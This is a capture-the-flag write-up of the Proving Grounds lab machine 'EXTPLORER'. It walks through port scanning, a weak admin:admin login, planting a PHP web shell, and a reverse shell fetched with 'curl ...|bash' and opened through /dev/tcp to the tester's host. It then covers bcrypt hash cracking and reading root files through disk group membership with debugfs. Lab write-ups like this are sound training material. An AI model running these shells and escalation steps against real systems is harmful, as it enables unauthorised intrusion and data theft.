OFFSEC - Proving Grounds - EXTPLORER

Table of Contents

Summary
#

On port 80 the is an application called eXtplorer on which we can login using weak credentials. Once logged in we get a reverse shell using PHP in combination with Wordpress. The user www-data cannot access local.txt so we need to move lateral to the dora user. We find a hash of this user in the /var/www/html/filemanager/config/.htusers.php file. Once we crack the hash using hashcat we can switch user and become the dora user. This user is member of the disk group which allows for any file to read on the filesystem, including proof.txt.

Specifications
#

Name: EXTPLORER
Platform: PG PRACTICE
Points: 20
Difficulty: Intermediate
OS: Linux dora 5.4.0-146-generic #163-Ubuntu SMP Fri Mar 17 18:26:02 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
IP address: 192.168.141.16
OFFSEC provided credentials: None
HASH: local.txt:450092b3f174e03a5f3eb1c2aba362b4
HASH: proof.txt:87f59058b8c30d503909a92c4a029af1

Preparation
#

First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:

## create directory structure
mkdir extplorer && cd extplorer && mkdir enum files exploits uploads tools

## list directory
ls -la

total 28
drwxrwxr-x  7 kali kali 4096 Aug 15 10:41 .
drwxrwxr-x 24 kali kali 4096 Aug 15 10:41 ..
drwxrwxr-x  2 kali kali 4096 Aug 15 10:41 enum
drwxrwxr-x  2 kali kali 4096 Aug 15 10:41 exploits
drwxrwxr-x  2 kali kali 4096 Aug 15 10:41 files
drwxrwxr-x  2 kali kali 4096 Aug 15 10:41 tools
drwxrwxr-x  2 kali kali 4096 Aug 15 10:41 uploads

## set bash variable
ip=192.168.141.16

## ping target to check if it's online
ping $ip

PING 192.168.141.16 (192.168.141.16) 56(84) bytes of data.
64 bytes from 192.168.141.16: icmp_seq=1 ttl=61 time=16.6 ms
64 bytes from 192.168.141.16: icmp_seq=2 ttl=61 time=16.8 ms
^C
--- 192.168.141.16 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 16.565/16.684/16.804/0.119 ms

Reconnaissance
#

Portscanning
#

Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.

## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.141.16:22
Open 192.168.141.16:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-15 10:45 CEST
Initiating Ping Scan at 10:45
Scanning 192.168.141.16 [4 ports]
Completed Ping Scan at 10:45, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:45
Completed Parallel DNS resolution of 1 host. at 10:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:45
Scanning 192.168.141.16 [2 ports]
Discovered open port 80/tcp on 192.168.141.16
Discovered open port 22/tcp on 192.168.141.16
Completed SYN Stealth Scan at 10:45, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.141.16
Host is up, received echo-reply ttl 61 (0.028s latency).
Scanned at 2025-08-15 10:45:16 CEST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 61
80/tcp open  http    syn-ack ttl 61

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

Copy the output of open ports into a file called ports within the files directory.

## edit the ``files/ports` file
nano files/ports

## content `ports` file:
22/tcp open  ssh     syn-ack ttl 61
80/tcp open  http    syn-ack ttl 61

Run the following command to get a string of all open ports and use the output of this command to paste within NMAP:

## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..

## output previous command
22,80

## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp

Output of NMAP:

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCmPOfERLKCxx+ufQz7eRTNuEEkJ+GX/hKPNPpCWlTiTgegmjYoXQ7MA5ibTRoJ6vxpPEggzNszJKbBrSVAbRuT2sBg4o7ywiGUy7vsDBpObMrBMsdKuue3gpkaNF8DL2pB3v/XAxtavq1Mh4vz4yj99cc2pX1GhSjpQTWlsK8Rl9DmBKp7t0XxEWwq3juQ9JiN5yAttMrbTDjwMNxcipsYv0pMudDBE6g4gQyiZGwuUfBn+HirxnfRr7KkxmBaEpZgukXSJ7fXYgpQVgNP2cvd2sy/PYe0kL7lOfYwG/DSLWV917RPIdsPPQYr+rqrBL7XQA2Qll30Ms9iAX1m9S6pT/vkaw6JQCgDwFSwPXrknf627jCS7vQ8mh8UL07nPO7Hkko3fnHIcxyJggi/BoAAi3GseOl7vCZl28+waWlNdbR8gaiZhDR1rLvimcm3pg3nv9m+0qfVRIs9fxq97cOEFeXhaGHXvQL6LYGK14ZG+jVXtPavID6txymiBOUsj8M=
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAweAzke7+zPt3Untb06RlI4MEp+vsEJICUG+0GgPMp+vxOdxEhcsVY0VGyuC+plTRlqNi0zNv1Y0Jj0BYRMSUw=
|   256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPJP5z2Scxa02tfhI1SClflg5QtVdhMImHwY7GugVtfY
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access
#

80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

On port 80 there is a Wordpress site redirecting to http://192.168.141.16/wp-admin/setup-config.php, but we can’t get anywhere with that because we don’t have credentials. So start a gobuster to see what directories there are available.

gobuster -t 100 dir -u http://$ip:80/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.141.16:80/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.141.16/wp-admin/]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.141.16/wordpress/]
/filemanager          (Status: 301) [Size: 322] [--> http://192.168.141.16/filemanager/]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.141.16/wp-includes/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.141.16/wp-content/]
/server-status        (Status: 403) [Size: 279]
Progress: 62286 / 62287 (100.00%)
===============================================================
Finished
===============================================================

There’s a /filemanager directory. Once we visit this URL (http://192.168.141.16/filemanager/) in the browser, we see it’s a eXtplorer login screen. Because it uses weak credentials, we can log into the application using these credentials: admin:admin.

Edit the default location of the port 80 redirect (’/wp-admin/setup-config.php’) with a PHP RCE so we can test is we can get RCE. Go to this file, right-click on it and select Edit .

Now, add the following line of code: <?php system($_REQUEST["cmd"]);?> to test is we can execute commands in the browser on the target.

Go to the follwing URL to see if we got code execution (http://192.168.141.16/wp-admin/setup-config.php?cmd=whoami). Indeed we can execute code as the www-data user.

Let’s get a reverse shell. First create a local .sh file which we will download and execute on the target.

## get the local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 192.168.45.204/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::c36:35f1:8cdf:ff6d/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

## setup a listener
nc -lvnp 9001
listening on [any] 9001 ...

## change directory
cd uploads

## create a file called `revshell.sh` with this content
#! /bin/bash
bash -c "bash -i >& /dev/tcp/192.168.45.204/9001 0>&1"

## setup a local webserver
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Now, change the content of the setup-config.php from <?php system($_REQUEST["cmd"]);?> to <?php system("curl http://192.168.45.204/revshell.sh|bash");?> and click save. This will download the created bash script and execute it, giving us a reverse shell once we trigger it by going to the URL: http://192.168.141.16/wp-admin/setup-config.php

Go to the URL: http://192.168.141.16/wp-admin/setup-config.php and catch the reverse shell as the www-data user in the /var/www/html directory.

## catch the reverse shell
nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.141.16] 54940
bash: cannot set terminal process group (1161): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dora:/var/www/html/wp-admin$

Lateral Movement
#

As the current user www-data we cannot read the local.txt because only the dora user can read this file. So we need to become the dora user.

## find the location of `local.txt`
www-data@dora:/var/www/html/wp-admin$ find / -iname 'local.txt' 2>/dev/null
/home/dora/local.txt

## print `local.txt`
www-data@dora:/var/www/html/wp-admin$ cat /home/dora/local.txt
cat: /home/dora/local.txt: Permission denied

## list directory content
www-data@dora:/var/www/html/wp-admin$ ls -la /home/dora
ls -la /home/dora
total 24
drwxr-xr-x 2 dora dora 4096 Apr  6  2023 .
drwxr-xr-x 3 root root 4096 Apr  6  2023 ..
-rw-r--r-- 1 dora dora  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 dora dora 3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 dora dora  807 Feb 25  2020 .profile
-r-------- 1 dora dora   33 Aug 15 08:39 local.txt

Looking in the /var/www/html directory for files containing dora we find a hash of the dora user. Now, copy the hash in a file called hash and crack it using hashcat and the rockyou.txt wordlist. Once cracked we get dora’s credentials: dora:doraemon. Switch to the dora user and print local.txt.

## change directory
cd /var/www/html

## grep for any file containing `dora`
grep -Ri 'dora' .
<SNIP>
./filemanager/config/.htusers.php:      array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
<SNIP>

## change directory
cd files

## create a file called `hash` with this content
$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS

## use hashcat to crack the hash with the rockyou.txt wordlist
hashcat -m 3200 ./hash /opt/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i7-10875H CPU @ 2.30GHz, 18695/37454 MB (8192 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS:doraemon
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/C...T7CjjS
Time.Started.....: Fri Aug 15 11:46:55 2025 (4 secs)
Time.Estimated...: Fri Aug 15 11:46:59 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/opt/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      448 H/s (3.56ms) @ Accel:8 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1536/14344385 (0.01%)
Rejected.........: 0/1536 (0.00%)
Restore.Point....: 1472/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:248-256
Candidate.Engine.: Device Generator
Candidates.#1....: maurice -> mexico1
Hardware.Mon.#1..: Util: 82%

Started: Fri Aug 15 11:46:48 2025
Stopped: Fri Aug 15 11:47:00 2025

## switch to the `dora` user
www-data@dora:/var/www/html$ su dora
su dora
Password: doraemon

## print `local.txt`
cat /home/dora/local.txt
450092b3f174e03a5f3eb1c2aba362b4

Privilege Escalation
#

To get a proper TTY we upgrade our shell using the script binary.

## determine location script binary
which script
/usr/bin/script

## start the script binary, after that press CTRL+Z
/usr/bin/script -qc /bin/bash /dev/null

## after this command press the `enter` key twice
stty raw -echo ; fg ; reset

## run the following to be able to clear the screen and set the terrminal correct
dora@dora:/var/www/html$ export TERM=xterm
dora@dora:/var/www/html$ stty columns 200 rows 200

Now, upload linpeas.sh to the target and run it.

## change directory locally
cd uploads

## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

## get local IP address on tun0
ip a | grep -A 10 tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 192.168.45.204/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::c36:35f1:8cdf:ff6d/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

## start local webserver
python3 -m http.server 80

## on target
## change directory
dora@dora:/var/www/html$ cd /var/tmp
dora@dora:/var/tmp$ 

## download `linpeas.sh`
dora@dora:/var/tmp$ wget http://192.168.45.204/linpeas.sh
Connecting to 192.168.45.204:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                          0%[                                                                                linpeas.sh                                         59%[===============================================================>                linpeas.sh                                        100%[=============================================================================================================>] 933.76K  3.10MB/s    in 0.3s    

2025-08-15 09:54:56 (3.10 MB/s) - ‘linpeas.sh’ saved [956174/956174]

## set the execution bit
dora@dora:/var/tmp$ chmod +x linpeas.sh 

## run `linpeas.sh`
dora@dora:/var/tmp$ ./linpeas.sh

The linpeas.sh output shows that the dora user is a member of the disk group, which is almost equivalent to root access, because we can read any file on disk. We can verify this by typing groups, for the current user. Now, list the filesystem and copy the value where / is into the debugfs command.

## check current users groups
dora@dora:/var/tmp$ groups
dora disk

## list the filesystem in human-readable format
dora@dora:/var/tmp$ df -h
Filesystem                         Size  Used Avail Use% Mounted on
/dev/mapper/ubuntu--vg-ubuntu--lv  9.8G  5.1G  4.2G  55% /
udev                               947M     0  947M   0% /dev
tmpfs                              992M     0  992M   0% /dev/shm
tmpfs                              199M  1.2M  198M   1% /run
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              992M     0  992M   0% /sys/fs/cgroup
/dev/loop0                          62M   62M     0 100% /snap/core20/1611
/dev/loop1                          64M   64M     0 100% /snap/core20/1852
/dev/loop2                          92M   92M     0 100% /snap/lxd/24061
/dev/loop3                          68M   68M     0 100% /snap/lxd/22753
/dev/sda2                          1.7G  209M  1.4G  13% /boot
/dev/loop4                          50M   50M     0 100% /snap/snapd/18596
tmpfs                              199M     0  199M   0% /run/user/1000

## load the `/dev/mapper/ubuntu--vg-ubuntu--lv` in the filesystem debugger
dora@dora:/var/tmp$ debugfs /dev/mapper/ubuntu--vg-ubuntu--lv
debugfs 1.45.5 (07-Jan-2020)

## print `proof.txt`
debugfs:  cat /root/proof.txt
87f59058b8c30d503909a92c4a029af1